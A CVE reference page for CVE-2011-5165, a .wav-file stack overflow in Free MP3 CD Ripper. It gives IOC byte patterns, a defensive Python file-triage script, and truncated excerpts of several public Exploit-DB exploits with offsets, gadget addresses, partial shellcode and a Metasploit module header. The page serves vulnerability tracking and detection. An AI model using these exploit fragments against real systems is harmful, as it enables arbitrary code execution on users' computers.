CVE-2011-5165
Published 2012-09-15
Priority: P3 · 46 · Severity: critical · CVSS 2.0 base score 9.3 · Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit available
EPSS: 37.00% (98.3rd percentile)
Stack-based buffer overflow in Free MP3 CD Ripper 1.1, 2.6 and earlier, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .wav file.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cleanersoft | free_mp3_cd_ripper | <= 2.6 | — |
| cleanersoft | free_mp3_cd_ripper | — | — |
| cleanersoft | free_mp3_cd_ripper | — | — |
Detection & IOCs (extracted from sources)
Byte patterns:
- 41 x 4116 bytes (offset to SEH) + EB 06 FF FF (nSEH short jump) + 79 2A E4 66 (SEH: POP ESI ogg.dll @ 0x66E42A79)
- 41 x 4112 bytes + 32 FA CA 76 (JMP ESP imagehlp) + 90 x 10 + shellcode
- 41 x 4112 bytes + D7 30 9D 7C (EIP 0x7C9D30D7) + 90 x 3 + shellcode
- 41 x 4112 bytes + DC 3A B4 76 (RET) + 90 x 15 + shellcode
- Trigger condition: a crafted .wav file opened via the application's 'wav to mp3' converter function causes a stack-based buffer overflow at offset 4112–4116 bytes into the file, overwriting the return address or SEH chain.
- SEH-based exploitation variant: look for .wav files where bytes 4116–4119 contain a short jump (EB 06 FF FF) followed by a 4-byte SEH handler address — more reliable across Windows 7 and 8 targets than vanilla EIP overwrite.
- Vanilla EIP overwrite variant: .wav files with 4112 bytes of padding ('A'/0x41) followed by a 4-byte JMP ESP gadget address and NOP sled — targets Windows XP SP2/SP3.
- Malicious .wav files exploiting this CVE will not conform to valid WAV RIFF chunk structure — the file content is raw binary padding followed by exploit bytes rather than a valid audio container.
- Bad characters for payload encoding in this vulnerability are \x00, \x0a, \x0d, \x20 — payloads in malicious .wav files should not contain these bytes.
- The exploited modules are ogg.dll (POP ESI gadget) and libFLAC.dll (POP/POP/RET gadget) loaded by Free MP3 CD Ripper — monitor for abnormal execution originating from these DLLs.
- The 0x7C9D30D7 EIP gadget is OS-specific and does not work on Windows 7; the SEH-based exploit using ogg.dll (0x66E42A79) is required for Windows 7 and 8 targets.
- The Metasploit module target (0x1001860b p/p/r in libFLAC.dll) is specific to Windows XP SP3 English; no other OS targets are defined in that module.
- The vanilla EIP overwrite PoC (0x76cafa32 JMP ESP in imagehlp.dll) was tested only on Windows XP SP2 and may not be reliable on other OS versions.
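A file-triage check built from the indicators above, added here as an example that is not from the page or from any of the exploit authors: it walks the RIFF chunk structure and flags the padding length and nSEH byte pattern the IOCs describe. The function names and the sample inputs are this example's own; the samples are constructed inline and carry no handler address or payload.

```python
import struct

# Offsets and byte pattern taken from the indicators above; names are this example's own.
EIP_OFFSET = 4112                   # padding length in the vanilla EIP-overwrite PoCs
SEH_OFFSET = 4116                   # padding length in the SEH-overwrite PoCs
NSEH_SHORT_JMP = b"\xeb\x06\xff\xff"

def walk_wav_chunks(buf):
    """Return the RIFF chunk ids in order, or None if the container is malformed."""
    if len(buf) < 12 or buf[:4] != b"RIFF" or buf[8:12] != b"WAVE":
        return None
    if struct.unpack_from("<I", buf, 4)[0] + 8 > len(buf):   # RIFF size overruns the file
        return None
    ids, pos = [], 12
    while pos + 8 <= len(buf):
        cid, size = buf[pos:pos + 4], struct.unpack_from("<I", buf, pos + 4)[0]
        ids.append(cid)
        pos += 8 + size + (size & 1)                          # chunks are word-aligned
        if pos > len(buf):                                    # chunk claims bytes past EOF
            return None
    return ids

def triage_wav(buf):
    """Return a list of findings; an empty list means nothing matched the CVE-2011-5165 IOCs."""
    findings = []
    chunks = walk_wav_chunks(buf)
    if chunks is None or b"fmt " not in chunks:
        findings.append("not a well-formed RIFF/WAVE container")
    run = len(buf) - len(buf.lstrip(b"\x41"))                 # leading 'A' (0x41) padding
    if run >= EIP_OFFSET:
        findings.append(f"{run} leading 0x41 bytes (>= {EIP_OFFSET}, the overflow offset)")
    if buf[SEH_OFFSET:SEH_OFFSET + 4] == NSEH_SHORT_JMP:
        findings.append("nSEH short jump EB 06 FF FF at offset 4116")
    return findings

def make_valid_wav(n_samples=4):
    """Constructed sample: a minimal 16-bit mono PCM WAV with a fmt and a data chunk."""
    data = b"\x00\x00" * n_samples
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(data)) + data)
    return b"RIFF" + struct.pack("<I", len(body)) + body

# Constructed sample with the IOC shape only: padding plus the nSEH pattern, no handler, no payload.
SUSPECT_SAMPLE = b"\x41" * SEH_OFFSET + NSEH_SHORT_JMP + b"\x90" * 8

if __name__ == "__main__":
    for name, sample in (("valid.wav", make_valid_wav()), ("suspect.wav", SUSPECT_SAMPLE)):
        print(name, triage_wav(sample) or "clean")
```

The structural check alone catches every PoC shape listed above, since none of them begins with a RIFF header; the offset checks add confidence when a file happens to be padded inside a valid container.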
No detection rules found.
Exploit-DB: Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)
exploitdb · 2015-04-24 · CVE-2011-5165
---
```python
#!/usr/bin/python
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# modified SEH Exploit https://www.exploit-db.com/exploits/36826/
# credit to ThreatActor at CoreRed.com
# Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe
# Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo ([email protected])
import struct

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x004103fe,  # POP EAX # RETN [fcrip.exe]
        0x004e91f4,  # ptr to &VirtualAlloc() [IAT fcrip.exe]
        0x00418ff8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe]
        0x00446c97,  # PUSH EAX # POP ESI # POP EB
```
Exploit-DB: Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)
exploitdb · 2015-04-23 · CVE-2011-5165
---
```perl
#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attempting a vanilla buffer overflow
# in fact it is an SEH based exploit
# using the address 0x7C9D30D7 limits the targets
# which I assume belongs to an OS file; it didn't work on win7
# yes he did find a buffer overflow since the offset reaches ESP before SEH
# in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
# This p0c > win 7s & 8s
# ThreatActor at CoreRed.com
##
my $file = "p0c.wav";
my $buff = "A" x 4116;                 # offset to SEH
my $nseh = "\xeb\x06\xff\xff";         # dat 8 jmp
my $seh  = pack('V', 0x66E42A79);      # 66E42A79 5E POP ESI ogg.dll
my $nop  = "\x90" x 28;
#msfvenom -p
```
Exploit-DB: Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow
exploitdb · 2015-03-22 · CVE-2011-5165
---
```python
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
#[+] Date: 20-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
## EDB Note: Didn't work with Windows 7.
from struct import pack

file = "evilfile.wav"
junk = "\x41" * 4112
eip = pack('<I', 0x7C9D30D7)
nops = "\x90" * 3
# Calc.exe Shellcode
# POC: http://youtu.be/_uvHKonqO2g
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
"\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
"\xb4\xae\x7d\x0
```
Exploit-DB: Free MP3 CD Ripper 1.1 - '.wav' Local Stack Buffer Overflow (Metasploit)
exploitdb · 2011-11-22 · CVE-2011-5165
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# class header and FILEFORMAT mixin as in standard Metasploit file-format modules
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a stack based buffer overflow found in Free MP3 CD
        Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious
        WAV file.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Richard Leahy',   # Initial discovery
          'X-h4ck',          # msf module is based on his poc
          'Tiago Henriques', # msf module
          'James Fitts'      # clean ups
        ]
```
Exploit-DB: Free MP3 CD Ripper 1.1 - Local Buffer Overflow
exploitdb · 2011-08-27 · CVE-2011-5165
---
```python
# ############################################################################
# Exploit Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow
# Software : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html
# Version : 1.1
# Tested on : Windows xp sp3 (en)
# Date : 27/08/2011
# Author : X-h4ck
# Website : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email : [email protected]
# Greetz : Wulns~ - Danzel - IllyrianWarrior- Ace - M4yh3m - Saldeath
# mywisdom - bi0 - Slimshaddy - d3trimentaL - Lekosta - Rigon
# H-Down - H3ll - Pretorian
# ############################################################################
filename = "3v1lf1l3.wav"
print("cr34t1ng 3v1l f1l3")
junk = "\x41" * 4112
ret = "\xDC\x3A\xB4\x76"
nopsled = "\x9
```
Exploit-DB: Free MP3 CD Ripper 2.6 - '.wav' Local Overflow
exploitdb · 2010-04-02 · CVE-2011-5165
---
```ruby
# Exploit Title: Free MP3 CD Ripper 2.6 0 day
# Date: 30/03/2010
# Author: Richard leahy
# Reference: http://www.exploit-db.com/exploits/11975/
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2
# to exploit this open up the application select file -> wav converter -> wav to mp3
# use your favourite programming language and print out the contents into a text file. save the text file as a .wav
# then open up the wav file and boom.
# feel free to email me [email protected]
# code
nop = "\x90"
# imagehlp
jmp_esp = [0x76cafa32].pack('V')
# shellcode opens notepad
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x3
```
Exploit-DB: Free MP3 CD Ripper 2.6 - '.wav' Local Stack Buffer Overflow
exploitdb · 2010-03-31 · CVE-2011-5165
---
Exploit-DB: Free MP3 CD Ripper 2.6 - '.wav' (PoC)
exploitdb · 2010-03-30 · CVE-2011-5165
---
```ruby
#!/usr/bin/env ruby
# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day
# Date: 30/03/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2
# to exploit this open up the application select file -> wav converter -> wav to mp3
# use your favourite programming language and print out the contents into a text file. save the text file as a .wav
# then open up the wav file and boom.
# feel free to email me [email protected]
# code
nop = "\x90"                      # nop
shellcode = "\xCC"                # just an interrupt, can be replaced by proper shellcode
jmp_esp = "\x32\xfa\xca\x76"      # find a jmp esp, i will use imagehlp; little endian so reverse it
boom = "A" * 4112 + jmp_esp +
```
Metasploit: Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious WAV file.
References:
- http://secunia.com/advisories/39193
- http://www.exploit-db.com/exploits/11975
- http://www.exploit-db.com/exploits/11976
- http://www.exploit-db.com/exploits/17727
- http://www.exploit-db.com/exploits/18142
- http://www.osvdb.org/63349
- http://www.securityfocus.com/bid/39672
- https://www.exploit-db.com/exploits/36465/
- https://www.exploit-db.com/exploits/36826/
- https://www.exploit-db.com/exploits/36827/